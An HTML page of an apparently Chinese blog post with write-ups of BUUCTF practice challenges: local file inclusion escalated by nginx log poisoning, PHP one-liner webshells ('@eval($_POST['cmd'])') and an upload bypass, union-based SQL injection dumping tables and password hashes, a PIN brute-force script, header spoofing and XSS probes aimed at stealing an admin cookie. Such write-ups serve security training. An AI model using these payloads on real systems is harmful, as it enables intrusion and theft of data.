<!doctype html><html lang=en dir=auto>
<head><meta charset=utf-8>
<meta http-equiv=x-ua-compatible content="IE=edge">
<meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no">
<meta name=robots content="index, follow">
<title>BUUCTF | 0opsdc</title>
<meta name=keywords content="CTF">
<meta name=description content="Basic Linux Labs  2020年10月24日 更新：目前所有靶机均能直接访问互联网。
点击启动靶机可以启动一台安装好了 LAMP 的机器。
并且这台机器位于靶机内网，所有动态靶机均可直接通过主机名访问这台机器。
但由于目前一个账户只能同时启动一台靶机，您如果有需要建议浏览器开一个隐私窗口，注册一个新账号来启动这个靶机。
ssh 用户名：root 密码：123456 地址和端口为动态分配的。
 开启环境后按照题目给定地址和端口使用SSH连接即可。
连接上云主机后使用ls命令，发现当前用户家目录下啥也没有，再使用cd ..命令切换到根目录下看看，发现flag.txt文件。
也可直接使用cat /flag.txt命令查看flag。
BUU LFI COURSE 1 启动环境后得到如下PHP代码：
<?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/7/9 * Time: 7:07 AM */ highlight_file(__FILE__); if(isset($_GET['file'])) { $str = $_GET['file']; include $_GET['file']; } 本地文件包含，通过file参数进行传参，可在URL后构造参数?file=/flag查看flag。
拓展 通过Wappalyzer插件可以发现网站使用了nginx服务，尝试访问nginx访问日志：
?file=/var/log/nginx/access.log页面回显出我们刚才的访问记录，接下来我们使用bp抓包尝试写入phpinfo。
通过在User-Agent字段最后插入aaaaaaa<?php phpinfo();?>bbbbbbb传入phpinfo()，刷新页面后检查是否传入成功。
Request请求包如下：
GET /?file=/var/log/nginx/access.log HTTP/1.1Host: <domain>:<port>Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.">
<meta name=author content="0opsdc">
<link rel=canonical href=https://examplesite.com/post/buuctf/>
<link crossorigin=anonymous href=/assets/css/stylesheet.min.5e2b4101351c21e906f398ae96901791830f58d430f96f2659dab7eaef7b3cb7.css integrity="sha256-XitBATUcIekG85iulpAXkYMPWNQw+W8mWdq36u97PLc=" rel="preload stylesheet" as=style>
<script defer crossorigin=anonymous src=/assets/js/highlight.min.7680afc38aa6b15ddf158a4f3780b7b1f7dde7e91d26f073e6229bb7a0793c92.js integrity="sha256-doCvw4qmsV3fFYpPN4C3sffd5+kdJvBz5iKbt6B5PJI=" onload=hljs.initHighlightingOnLoad()></script>
<link rel=icon href=https://gitee.com/oopsdc/PicBed/raw/master/oopsdc.tk/favicon.png>
<link rel=icon type=image/png sizes=16x16 href=https://gitee.com/oopsdc/PicBed/raw/master/oopsdc.tk/favicon.png>
<link rel=icon type=image/png sizes=32x32 href=https://gitee.com/oopsdc/PicBed/raw/master/oopsdc.tk/favicon.png>
<link rel=apple-touch-icon href=https://gitee.com/oopsdc/PicBed/raw/master/oopsdc.tk/favicon.png>
<link rel=mask-icon href=https://gitee.com/oopsdc/PicBed/raw/master/oopsdc.tk/favicon.png>
<meta name=theme-color content="#2e2e33">
<meta name=msapplication-TileColor content="#2e2e33">
<meta name=generator content="Hugo 0.88.1">
<noscript>
<style>#theme-toggle,.top-link{display:none}</style>
<style>@media(prefers-color-scheme:dark){:root{--theme:rgb(29, 30, 32);--entry:rgb(46, 46, 51);--primary:rgb(218, 218, 219);--secondary:rgb(155, 156, 157);--tertiary:rgb(65, 66, 68);--content:rgb(196, 196, 197);--hljs-bg:rgb(46, 46, 51);--code-bg:rgb(55, 56, 62);--border:rgb(51, 51, 51)}.list{background:var(--theme)}.list:not(.dark)::-webkit-scrollbar-track{background:0 0}.list:not(.dark)::-webkit-scrollbar-thumb{border-color:var(--theme)}}</style>
</noscript>
<script type=application/javascript>var doNotTrack=!1;doNotTrack||(function(a,e,f,g,b,c,d){a.GoogleAnalyticsObject=b,a[b]=a[b]||function(){(a[b].q=a[b].q||[]).push(arguments)},a[b].l=1*new Date,c=e.createElement(f),d=e.getElementsByTagName(f)[0],c.async=1,c.src=g,d.parentNode.insertBefore(c,d)}(window,document,'script','https://www.google-analytics.com/analytics.js','ga'),ga('create','UA-123-45','auto'),ga('send','pageview'))</script><meta property="og:title" content="BUUCTF">
<meta property="og:description" content="Basic Linux Labs  2020年10月24日 更新：目前所有靶机均能直接访问互联网。
点击启动靶机可以启动一台安装好了 LAMP 的机器。
并且这台机器位于靶机内网，所有动态靶机均可直接通过主机名访问这台机器。
但由于目前一个账户只能同时启动一台靶机，您如果有需要建议浏览器开一个隐私窗口，注册一个新账号来启动这个靶机。
ssh 用户名：root 密码：123456 地址和端口为动态分配的。
 开启环境后按照题目给定地址和端口使用SSH连接即可。
连接上云主机后使用ls命令，发现当前用户家目录下啥也没有，再使用cd ..命令切换到根目录下看看，发现flag.txt文件。
也可直接使用cat /flag.txt命令查看flag。
BUU LFI COURSE 1 启动环境后得到如下PHP代码：
<?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/7/9 * Time: 7:07 AM */ highlight_file(__FILE__); if(isset($_GET['file'])) { $str = $_GET['file']; include $_GET['file']; } 本地文件包含，通过file参数进行传参，可在URL后构造参数?file=/flag查看flag。
拓展 通过Wappalyzer插件可以发现网站使用了nginx服务，尝试访问nginx访问日志：
?file=/var/log/nginx/access.log页面回显出我们刚才的访问记录，接下来我们使用bp抓包尝试写入phpinfo。
通过在User-Agent字段最后插入aaaaaaa<?php phpinfo();?>bbbbbbb传入phpinfo()，刷新页面后检查是否传入成功。
Request请求包如下：
GET /?file=/var/log/nginx/access.log HTTP/1.1Host: <domain>:<port>Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.">
<meta property="og:type" content="article">
<meta property="og:url" content="https://examplesite.com/post/buuctf/"><meta property="og:image" content="https://examplesite.com/%3Clink%20or%20path%20of%20image%20for%20opengraph,%20twitter-cards%3E"><meta property="article:section" content="post">
<meta property="article:published_time" content="2021-08-13T10:08:21+08:00">
<meta property="article:modified_time" content="2021-08-13T10:08:21+08:00"><meta property="og:site_name" content="0opsdc">
<meta name=twitter:card content="summary_large_image">
<meta name=twitter:image content="https://examplesite.com/%3Clink%20or%20path%20of%20image%20for%20opengraph,%20twitter-cards%3E">
<meta name=twitter:title content="BUUCTF">
<meta name=twitter:description content="Basic Linux Labs  2020年10月24日 更新：目前所有靶机均能直接访问互联网。
点击启动靶机可以启动一台安装好了 LAMP 的机器。
并且这台机器位于靶机内网，所有动态靶机均可直接通过主机名访问这台机器。
但由于目前一个账户只能同时启动一台靶机，您如果有需要建议浏览器开一个隐私窗口，注册一个新账号来启动这个靶机。
ssh 用户名：root 密码：123456 地址和端口为动态分配的。
 开启环境后按照题目给定地址和端口使用SSH连接即可。
连接上云主机后使用ls命令，发现当前用户家目录下啥也没有，再使用cd ..命令切换到根目录下看看，发现flag.txt文件。
也可直接使用cat /flag.txt命令查看flag。
BUU LFI COURSE 1 启动环境后得到如下PHP代码：
<?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/7/9 * Time: 7:07 AM */ highlight_file(__FILE__); if(isset($_GET['file'])) { $str = $_GET['file']; include $_GET['file']; } 本地文件包含，通过file参数进行传参，可在URL后构造参数?file=/flag查看flag。
拓展 通过Wappalyzer插件可以发现网站使用了nginx服务，尝试访问nginx访问日志：
?file=/var/log/nginx/access.log页面回显出我们刚才的访问记录，接下来我们使用bp抓包尝试写入phpinfo。
通过在User-Agent字段最后插入aaaaaaa<?php phpinfo();?>bbbbbbb传入phpinfo()，刷新页面后检查是否传入成功。
Request请求包如下：
GET /?file=/var/log/nginx/access.log HTTP/1.1Host: <domain>:<port>Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.">
<script type=application/ld+json>{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Posts","item":"https://examplesite.com/post/"},{"@type":"ListItem","position":2,"name":"BUUCTF","item":"https://examplesite.com/post/buuctf/"}]}</script>
<script type=application/ld+json>{"@context":"https://schema.org","@type":"BlogPosting","headline":"BUUCTF","name":"BUUCTF","description":"Basic Linux Labs  2020年10月24日 更新：目前所有靶机均能直接访问互联网。\n点击启动靶机可以启动一台安装好了 LAMP 的机器。\n并且这台机器位于靶机内网，所有动态靶机均可直接通过主机名访问这台机器。\n但由于目前一个账户只能同时启动一台靶机，您如果有需要建议浏览器开一个隐私窗口，注册一个新账号来启动这个靶机。\nssh 用户名：root 密码：123456 地址和端口为动态分配的。\n 开启环境后按照题目给定地址和端口使用SSH连接即可。\n连接上云主机后使用ls命令，发现当前用户家目录下啥也没有，再使用cd ..命令切换到根目录下看看，发现flag.txt文件。\n也可直接使用cat /flag.txt命令查看flag。\nBUU LFI COURSE 1 启动环境后得到如下PHP代码：\n\u0026lt;?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/7/9 * Time: 7:07 AM */ highlight_file(__FILE__); if(isset($_GET[\u0026#39;file\u0026#39;])) { $str = $_GET[\u0026#39;file\u0026#39;]; include $_GET[\u0026#39;file\u0026#39;]; } 本地文件包含，通过file参数进行传参，可在URL后构造参数?file=/flag查看flag。\n拓展 通过Wappalyzer插件可以发现网站使用了nginx服务，尝试访问nginx访问日志：\n?file=/var/log/nginx/access.log\r页面回显出我们刚才的访问记录，接下来我们使用bp抓包尝试写入phpinfo。\n通过在User-Agent字段最后插入aaaaaaa\u0026lt;?php phpinfo();?\u0026gt;bbbbbbb传入phpinfo()，刷新页面后检查是否传入成功。\nRequest请求包如下：\nGET /?file=/var/log/nginx/access.log HTTP/1.1\rHost: \u0026lt;domain\u0026gt;:\u0026lt;port\u0026gt;\rCache-Control: max-age=0\rUpgrade-Insecure-Requests: 1\rUser-Agent: Mozilla/5.","keywords":["CTF"],"articleBody":"Basic Linux Labs  2020年10月24日 更新：目前所有靶机均能直接访问互联网。\n点击启动靶机可以启动一台安装好了 LAMP 的机器。\n并且这台机器位于靶机内网，所有动态靶机均可直接通过主机名访问这台机器。\n但由于目前一个账户只能同时启动一台靶机，您如果有需要建议浏览器开一个隐私窗口，注册一个新账号来启动这个靶机。\nssh 用户名：root 密码：123456 地址和端口为动态分配的。\n 开启环境后按照题目给定地址和端口使用SSH连接即可。\n连接上云主机后使用ls命令，发现当前用户家目录下啥也没有，再使用cd ..命令切换到根目录下看看，发现flag.txt文件。\n也可直接使用cat /flag.txt命令查看flag。\nBUU LFI COURSE 1 启动环境后得到如下PHP代码：\nphp /** * Created by PhpStorm. * User: jinzhao * Date: 2019/7/9 * Time: 7:07 AM */ highlight_file(__FILE__); if(isset($_GET['file'])) { $str = $_GET['file']; include $_GET['file']; } 本地文件包含，通过file参数进行传参，可在URL后构造参数?file=/flag查看flag。\n拓展 通过Wappalyzer插件可以发现网站使用了nginx服务，尝试访问nginx访问日志：\n?file=/var/log/nginx/access.log\r页面回显出我们刚才的访问记录，接下来我们使用bp抓包尝试写入phpinfo。\n通过在User-Agent字段最后插入aaaaaaabbbbbbb传入phpinfo()，刷新页面后检查是否传入成功。\nRequest请求包如下：\nGET /?file=/var/log/nginx/access.log HTTP/1.1\rHost: :\rCache-Control: max-age=0\rUpgrade-Insecure-Requests: 1\rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36aaaaaaabbbbbbb\rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\rAccept-Encoding: gzip, deflate\rAccept-Language: en-US,en;q=0.9\rConnection: close\r依照上述方法，我们还可直接上传一句话木马进行连接：\nGET /?file=/var/log/nginx/access.log HTTP/1.1\rHost: :\rCache-Control: max-age=0\rUpgrade-Insecure-Requests: 1\rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36aaaaaaabbbbbbb\rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\rAccept-Encoding: gzip, deflate\rAccept-Language: en-US,en;q=0.9\rConnection: close\rShell url: http://:/?file=/var/log/nginx/access.log\rShell pwd: cmd\rUpload-Labs-Linux 是一个在线的Uplaod-Labs靶场。\n我们先过第一关，题目要求上传一个webshell到服务器，写个一句话php马：\nphp @eval($_POST['cmd']);?点击上传时却显示文件格式不符合要求，盲猜只有一个前端验证。\n将webshell.php改为webshell.jpg，然后使用bp抓取上传文件时的数据包，放到Repeater模块，将下面的webshell.jpg改为webshell.php即可：\n------WebKitFormBoundaryDSXCGFcAK1IJkpgn\rContent-Disposition: form-data; name=\"upload_file\"; filename=\"webshell.jpg\"\rBUU CODE REVIEW 1 启动环境后得到如下PHP代码：\nphp /** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */ highlight_file(__FILE__); class BUU { public $correct = \"\"; public $input = \"\"; public function __destruct() { try { $this-correct = base64_encode(uniqid()); if($this-correct === $this-input) { echo file_get_contents(\"/flag\"); } } catch (Exception $e) { } } } if($_GET['pleaseget'] === '1') { if($_POST['pleasepost'] === '2') { if(md5($_POST['md51']) == md5($_POST['md52']) \u0026\u0026 $_POST['md51'] != $_POST['md52']) { unserialize($_POST['obj']); } } } 代码审计，题目的考察点在于MD5绕过和反序列化，我们所需提交的内容如下：\nGET提交:\tpleaseget=1\rPOST提交第一部分:\tpleasepost=2\u0026md51=0\u0026md52=\"a\"\rPOST提交第二部分:\tobj，一个BUU类的实例化对象，属性值在经过$this-correct=base64_encode(uniqid());之后依然全等，可以通过把变化的$correct属性引用赋值给$input\r// 解析\r__destruct():\t对象所有引用都被删除或当对象被显示销毁时执行\runiqid():\t基于以微秒的当前时间生成一个唯一ID\r传值赋值:\t变量默认为传值赋值，即当一个表达式的值赋予一个变量时，整个原始表达式的值被赋到目标变量。如把变量a的值赋给变量b，改变a的值不会影响b的值，反之亦然\r引用赋值:\t新变量会简单引用(也可理解为指向)原始变量，改动新变量值的同时也会改变原始变量的值，反之亦然\r接下来我们就编写代码构造payload：\nphp class BUU{ public $correct = \"\"; public $input = \"\"; public function __destruct() { try { $this-correct = base64_encode(uniqid()); if ($this-correct === $this-input) { echo file_get_contents(\"/flag\"); } } catch (Exception $e){ } } } $res = new BUU(); $res-input = \u0026$res-correct;\t// 传入一个引用 echo serialize($res); ?执行结果:\nO:3:\"BUU\":2:{s:7:\"correct\";s:0:\"\";s:5:\"input\";R:2;}\r传递参数如下：\nGET:\rpleaseget=1\rPOST:\rpleasepost=2\r\u0026md51[]=1\r\u0026md52[]=2\r\u0026obj=O:3:\"BUU\":2:{s:7:\"correct\";s:0:\"\";s:5:\"input\";R:2;}\rBUU BRUTE 1 是一个登录框，尝试admin/admin，页面回显密码错误，为四位数字。，直接上bp爆破。\n步骤一\n抓取点击提交按钮时的数据包并发送至Intruder模块。\n步骤二\n在Inturder模块中将password设置为payload，然后选择数字字典。\n步骤三\n可将爆破间隔时间调高避免被封。\n也可用以下python脚本：\nimport requests import time url = 'http://:/?username=admin\u0026password=' for i in range(6000, 6499): res = requests.get(url+str(i)) time.sleep(0.1) if res.text != '密码错误，为四位数字。': print(res.text) break sqli-labs SQL注入，传入参数id=1和id=-1，页面回显正常，传入id=1'，页面报错，判断为字符型注入。使用联合查询看看有几列数据：\n?id=-1'union select 1,2,3--+ 经过尝试后发现总共有三列数据，查看当前库名：\n?id=-1'union select 1,database(),3--+ 爆库名：\n?id=-1'union select 1,database(),group_concat(schema_name) from information_schema.schemata--+ // 结果如下 Your Login name:security Your Password:ctftraining,information_schema,mysql,performance_schema,security,test 爆表名：\n?id=-1'union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='ctftraining'--+ // 结果如下 Your Login name:security Your Password:flag,news,users 爆列名：\n?id=-1'union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema='ctftraining' and table_name='flag'--+ // 结果如下 Your Login name:security Your Password:flag 爆字段：\nid=-1'union select 1,database(),group_concat(flag) from ctftraining.flag--+ BUU SQL COURSE 1 一个简单的新闻网，尝试在登录框进行SQL注入，发现都被过滤了。本来打算在测试新闻页面进行注入的，可是没找到注入点，发现登录框注入行不通后，打开网络控制台，切换到Network模块，看看页面都加载了什么资源，发现有一个content_detail.php页面：\n:/backend/content_detail.php?id=1\r进行注入类型判断：\n?id=1 and 1=1--+\t// 页面回显正常 ?id=1 and 1=2--+\t// 页面回显错误 判断为数字型注入。\n使用联合查询查看有几列数据：\n?id=-1 union select 1,2--+ 一共有两列数据，均为回显点。\n爆库：\n?id=-1 union select 1,group_concat(schema_name) from information_schema.schemata // 结果 {\"title\":\"1\",\"content\":\"information_schema,ctftraining,mysql,performance_schema,test,news\"} 爆表：\n?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining'--+  // 结果 {\"title\":\"1\",\"content\":\"FLAG_TABLE,news,users\"} 爆列：\n?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'--+  // 结果 {\"title\":\"1\",\"content\":\"id,username,password,ip,time,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS\"} 爆字段：\n// username字段 ?id=-1 union select 1,group_concat(username) from ctftraining.users--+ {\"title\":\"1\",\"content\":\"admin,guest,virink\"} // password字段 ?id=-1 union select 1,group_concat(password) from ctftraining.users--+ {\"title\":\"1\",\"content\":\"21232f297a57a5a743894a0e4a801fc3,084e0343a0486ff05530df6c705c8bb4,a4346e75cc1dd161a8d57f3b2d5d82d0\"} 然后发现密码不对，再尝试爆破news表，步骤如上。\nBUU UPLOAD COURSE 1 页面如下：\n查看页面元素：\nform action=\"index.php?file=upload.php\" method=\"post\" enctype=\"multipart/form-data\" input type=\"file\" name=\"upload_file\" input type=\"submit\" value=\"上传\" form 发现此处通过file参数调用文件，检查一下是否存在文件包含漏洞，上传一个phpinfo看看：\nphp phpinfo();?上传成功后会随机返回一个地址，而且文件后缀被更改为.jpg，我们查看命令是否能被解析：\n?file=uploads/.jpg\r成功回显phpinfo页面，按照划水经验来讲，flag应该在根目录，在bp中将文件内容更改如下：\nphp system(\"cat /flag\");?发包，访问，成功获得flag。\nBUU BURP COURSE 1 访问页面，显示只能本地访问，分别尝试构造了X-Forwarded-For、X-Originating-IP、X-Remote-IP、X-Remote-Addr四个字段，均未成功…\n查了资料发现还有个X-Real-IP，在bp中添加请求头，访问成功，是一个登录页面，将URL复制，粘贴到浏览器访问：\n点击登录后还是显示只能本地访问，抓取点击登录的包，放在bp里面添加请求头，查看响应包即可。\n X-Forwarded-For：记录代理信息，每经过一次代理（匿名代理除外），代理服务器都会把这次请求的来源IP追加在X-Forwarded-For中并且用逗号分隔。\nX-Real-IP：一般只记录真实发出请求的客户端IP。\n BUU XSS COURSE 1 一个树洞系统，分为留言和登录两个模块，猜测需要通过XSS获取管理员Cookie进行登录。\n先检验一下过滤情况，在留言处输入如下语句：\nscrIpTalert(/xss/)scrIpT 提交后会回显一个随机地址，访问发现什么也没有，打开控制台查看页面元素：\nspan data-v-1a9a378f=\"\" scriptalert(/xss/)script span 语句被放到了span标签中，接下来看看能否使用img标签：\nimg src=# onerror=alert(xss)/ 页面无法加载图片，标签能够正常使用，页面元素：\nspan data-v-1a9a378f=\"\" img src=\"#\" onerror=\"alert(xss)/\" span 接下来我们就需要构造一个存储型XSS，获取管理员Cookie，登录得到flag。那么现在还缺少一个相应的接收平台，这里使用XSS Platform (buuoj.cn)进行构造。\n注册登录后选择创建项目。\n平台暂时使用不了……\nPikaChu  本文链接：BUUCTF | Atmet\n文章许可：本文采用CC BY-NC-SA 4.0许可协议，转载请注明出处。\n ","wordCount":"532","inLanguage":"en","datePublished":"2021-08-13T10:08:21+08:00","dateModified":"2021-08-13T10:08:21+08:00","author":{"@type":"Person","name":"0opsdc"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://examplesite.com/post/buuctf/"},"publisher":{"@type":"Organization","name":"0opsdc","logo":{"@type":"ImageObject","url":"https://gitee.com/oopsdc/PicBed/raw/master/oopsdc.tk/favicon.png"}}}</script>
</head>
<body id=top>
<script>localStorage.getItem("pref-theme")==="dark"?document.body.classList.add('dark'):localStorage.getItem("pref-theme")==="light"?document.body.classList.remove('dark'):window.matchMedia('(prefers-color-scheme: dark)').matches&&document.body.classList.add('dark')</script>
<header class=header>
<nav class=nav>
<div class=logo>
<a href=https://examplesite.com/ accesskey=h title="Home (Alt + H)">Home</a>
<span class=logo-switches>
<button id=theme-toggle accesskey=t title="(Alt + T)"><svg id="moon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M21 12.79A9 9 0 1111.21 3 7 7 0 0021 12.79z"/></svg><svg id="sun" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><circle cx="12" cy="12" r="5"/><line x1="12" y1="1" x2="12" y2="3"/><line x1="12" y1="21" x2="12" y2="23"/><line x1="4.22" y1="4.22" x2="5.64" y2="5.64"/><line x1="18.36" y1="18.36" x2="19.78" y2="19.78"/><line x1="1" y1="12" x2="3" y2="12"/><line x1="21" y1="12" x2="23" y2="12"/><line x1="4.22" y1="19.78" x2="5.64" y2="18.36"/><line x1="18.36" y1="5.64" x2="19.78" y2="4.22"/></svg>
</button>
</span>
</div>
<ul id=menu>
<li>
<a href=https://examplesite.com/archives/ title=Archives>
<span>Archives</span>
</a>
</li>
<li>
<a href=https://examplesite.com/tags/ title=Tags>
<span>Tags</span>
</a>
</li>
<li>
<a href=https://examplesite.com/search/ title="Search (Alt + /)" accesskey=/>
<span>Search</span>
</a>
</li>
</ul>
</nav>
</header>
<main class=main>
<article class=post-single>
<header class=post-header>
<div class=breadcrumbs><a href=https://examplesite.com/>Home</a>&nbsp;»&nbsp;<a href=https://examplesite.com/post/>Posts</a></div>
<h1 class=post-title>
BUUCTF
</h1>
<div class=post-meta>August 13, 2021&nbsp;·&nbsp;0opsdc
</div>
</header> <div class=toc>
<details>
<summary accesskey=c title="(Alt + C)">
<span class=details>Table of Contents</span>
</summary>
<div class=inner><ul>
<li>
<a href=#basic aria-label=Basic>Basic</a><ul>
<li>
<a href=#linux-labs aria-label="Linux Labs">Linux Labs</a></li>
<li>
<a href=#buu-lfi-course-1 aria-label="BUU LFI COURSE 1">BUU LFI COURSE 1</a><ul>
<li>
<a href=#%e6%8b%93%e5%b1%95 aria-label=拓展>拓展</a></li></ul>
</li>
<li>
<a href=#upload-labs-linux aria-label=Upload-Labs-Linux>Upload-Labs-Linux</a></li>
<li>
<a href=#buu-code-review-1 aria-label="BUU CODE REVIEW 1">BUU CODE REVIEW 1</a></li>
<li>
<a href=#buu-brute-1 aria-label="BUU BRUTE 1">BUU BRUTE 1</a></li>
<li>
<a href=#sqli-labs aria-label=sqli-labs>sqli-labs</a></li>
<li>
<a href=#buu-sql-course-1 aria-label="BUU SQL COURSE 1">BUU SQL COURSE 1</a></li>
<li>
<a href=#buu-upload-course-1 aria-label="BUU UPLOAD COURSE 1">BUU UPLOAD COURSE 1</a></li>
<li>
<a href=#buu-burp-course-1 aria-label="BUU BURP COURSE 1">BUU BURP COURSE 1</a></li>
<li>
<a href=#buu-xss-course-1 aria-label="BUU XSS COURSE 1">BUU XSS COURSE 1</a></li>
<li>
<a href=#pikachu aria-label=PikaChu>PikaChu</a>
</li>
</ul>
</li>
</ul>
</div>
</details>
</div>
<div class=post-content><h1 id=basic>Basic<a hidden class=anchor aria-hidden=true href=#basic>#</a></h1>
<h2 id=linux-labs>Linux Labs<a hidden class=anchor aria-hidden=true href=#linux-labs>#</a></h2>
<blockquote>
<p>2020年10月24日 更新：目前所有靶机均能直接访问互联网。</p>
<p>点击启动靶机可以启动一台安装好了 LAMP 的机器。</p>
<p>并且这台机器位于靶机内网，所有动态靶机均可直接通过主机名访问这台机器。</p>
<p>但由于目前一个账户只能同时启动一台靶机，您如果有需要建议浏览器开一个隐私窗口，注册一个新账号来启动这个靶机。</p>
<p>ssh 用户名：root 密码：123456 地址和端口为动态分配的。</p>
</blockquote>
<p>开启环境后按照题目给定地址和端口使用<code>SSH</code>连接即可。</p>
<p>连接上云主机后使用<code>ls</code>命令，发现当前用户家目录下啥也没有，再使用<code>cd ..</code>命令切换到根目录下看看，发现<code>flag.txt</code>文件。</p>
<p>也可直接使用<code>cat /flag.txt</code>命令查看<code>flag</code>。</p>
<h2 id=buu-lfi-course-1>BUU LFI COURSE 1<a hidden class=anchor aria-hidden=true href=#buu-lfi-course-1>#</a></h2>
<p>启动环境后得到如下<code>PHP</code>代码：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-php data-lang=php><span style=color:#f92672>&lt;?</span><span style=color:#a6e22e>php</span>
<span style=color:#e6db74>/**
</span><span style=color:#e6db74> * Created by PhpStorm.
</span><span style=color:#e6db74> * User: jinzhao
</span><span style=color:#e6db74> * Date: 2019/7/9
</span><span style=color:#e6db74> * Time: 7:07 AM
</span><span style=color:#e6db74> */</span>

<span style=color:#a6e22e>highlight_file</span>(<span style=color:#66d9ef>__FILE__</span>);

<span style=color:#66d9ef>if</span>(<span style=color:#a6e22e>isset</span>($_GET[<span style=color:#e6db74>&#39;file&#39;</span>])) {
    $str <span style=color:#f92672>=</span> $_GET[<span style=color:#e6db74>&#39;file&#39;</span>];

    <span style=color:#66d9ef>include</span> $_GET[<span style=color:#e6db74>&#39;file&#39;</span>];
}
</code></pre></div><p>本地文件包含，通过<code>file</code>参数进行传参，可在<code>URL</code>后构造参数<code>?file=/flag</code>查看<code>flag</code>。</p>
<h3 id=拓展>拓展<a hidden class=anchor aria-hidden=true href=#拓展>#</a></h3>
<p>通过<code>Wappalyzer</code>插件可以发现网站使用了<code>nginx</code>服务，尝试访问<code>nginx</code>访问日志：</p>
<pre tabindex=0><code>?file=/var/log/nginx/access.log
</code></pre><p>页面回显出我们刚才的访问记录，接下来我们使用<code>bp</code>抓包尝试写入<code>phpinfo</code>。</p>
<p>通过在<code>User-Agent</code>字段最后插入<code>aaaaaaa&lt;?php phpinfo();?>bbbbbbb</code>传入<code>phpinfo()</code>，刷新页面后检查是否传入成功。</p>
<p><code>Request</code>请求包如下：</p>
<pre tabindex=0><code>GET /?file=/var/log/nginx/access.log HTTP/1.1
Host: &lt;domain&gt;:&lt;port&gt;
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36aaaaaaa&lt;?php phpinfo();?&gt;bbbbbbb
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
</code></pre><p>依照上述方法，我们还可直接上传一句话木马进行连接：</p>
<pre tabindex=0><code>GET /?file=/var/log/nginx/access.log HTTP/1.1
Host: &lt;domain&gt;:&lt;port&gt;
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36aaaaaaa&lt;?php @eval($_POST['cmd']);?&gt;bbbbbbb
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
</code></pre><pre tabindex=0><code>Shell url: http://&lt;domain&gt;:&lt;port&gt;/?file=/var/log/nginx/access.log
Shell pwd: cmd
</code></pre><h2 id=upload-labs-linux>Upload-Labs-Linux<a hidden class=anchor aria-hidden=true href=#upload-labs-linux>#</a></h2>
<p>是一个在线的<code>Uplaod-Labs</code>靶场。</p>
<p>我们先过第一关，题目要求上传一个<code>webshell</code>到服务器，写个一句话<code>php</code>马：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-php data-lang=php><span style=color:#f92672>&lt;?</span><span style=color:#a6e22e>php</span> <span style=color:#f92672>@</span><span style=color:#66d9ef>eval</span>($_POST[<span style=color:#e6db74>&#39;cmd&#39;</span>]);<span style=color:#75715e>?&gt;</span><span style=color:#960050;background-color:#1e0010>
</span></code></pre></div><p>点击上传时却显示文件格式不符合要求，盲猜只有一个前端验证。</p>
<p>将<code>webshell.php</code>改为<code>webshell.jpg</code>，然后使用<code>bp</code>抓取上传文件时的数据包，放到<code>Repeater</code>模块，将下面的<code>webshell.jpg</code>改为<code>webshell.php</code>即可：</p>
<pre tabindex=0><code>------WebKitFormBoundaryDSXCGFcAK1IJkpgn
Content-Disposition: form-data; name=&quot;upload_file&quot;; filename=&quot;webshell.jpg&quot;
</code></pre><h2 id=buu-code-review-1>BUU CODE REVIEW 1<a hidden class=anchor aria-hidden=true href=#buu-code-review-1>#</a></h2>
<p>启动环境后得到如下<code>PHP</code>代码：</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-php data-lang=php><span style=color:#f92672>&lt;?</span><span style=color:#a6e22e>php</span>
<span style=color:#e6db74>/**
</span><span style=color:#e6db74> * Created by PhpStorm.
</span><span style=color:#e6db74> * User: jinzhao
</span><span style=color:#e6db74> * Date: 2019/10/6
